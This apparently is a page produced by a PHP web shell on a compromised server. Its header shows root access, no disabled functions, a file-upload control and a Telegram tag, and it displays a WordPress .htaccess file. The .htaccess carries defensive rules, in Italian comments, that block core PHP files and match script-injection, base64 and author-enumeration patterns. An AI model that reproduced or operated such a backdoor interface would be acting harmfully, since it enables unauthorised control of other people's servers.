HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System: Linux atalantini.com 3.10.0-1127.13.1.el7.x86_64 #1 SMP Tue Jun 23 15:46:38 UTC 2020 x86_64
User: root (0)
PHP: 7.2.34
Disabled: NONE
$ pwd: /var/www/html/maisonimmobiliare/
Upload Files
File: /var/www/html/maisonimmobiliare/.htaccess
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

<files wp-config.php>
order allow,deny
deny from all
</files>

<Files .htaccess>
  order allow,deny
  deny from all
</Files>

# Protezione dei file che non devono essere letti in HTTP
# Blocco tutti i file PHP meno le azioni di login, cron e commenti.
 
RewriteCond %{REQUEST_URI} !^/wp-(login|cron|comments-post)\.php$
RewriteRule ^wp-([_0-9a-zA-Z-]+)\.php [R=404,L]
 
# Protezione file che non devono essere letti in HTTP
# Qui blocco alcuni file PHP del core e altri che danno informazioni 
 
RewriteRule ^readme.html(.*)        [R=404,L]
RewriteRule ^license.txt(.*)        [R=404,L]
RewriteRule ^licenza.txt(.*)        [R=404,L]
RewriteRule ^wp-content/(.*)\.php$  [R=404,L]
RewriteRule ^wp-includes/(.*)\.php$ [R=404,L]


# Protezione contro script injection di carattere generale
# con il controllo delle stringhe piĆ¹ conosciute su URL
 
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

# Protezione contro la enumerazione degli utenti presenti
# nel database di wordpress tramite chiamata URL?author
 
RewriteCond %{REQUEST_URI}  ^/$
RewriteCond %{QUERY_STRING} (^|&)author=([0-9]*)
RewriteRule ^(.*)$ https://%{SERVER_NAME}/? [L,R=301]

# END WordPress

## LEVERAGE BROWSER CACHING ##
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType image/jpg "access 1 year"
ExpiresByType image/jpeg "access 1 year"
ExpiresByType image/gif "access 1 year"
ExpiresByType image/png "access 1 year"
ExpiresByType text/css "access 1 month"
ExpiresByType application/pdf "access 1 month"
ExpiresByType application/x-javascript "access 1 month"
ExpiresByType application/javascript "access 1 month"
ExpiresByType application/x-shockwave-flash "access 1 month"
ExpiresByType image/x-icon "access 1 year"
ExpiresDefault "access 2 days"
</IfModule>
## LEVERAGE BROWSER CACHING ##
@ Telegram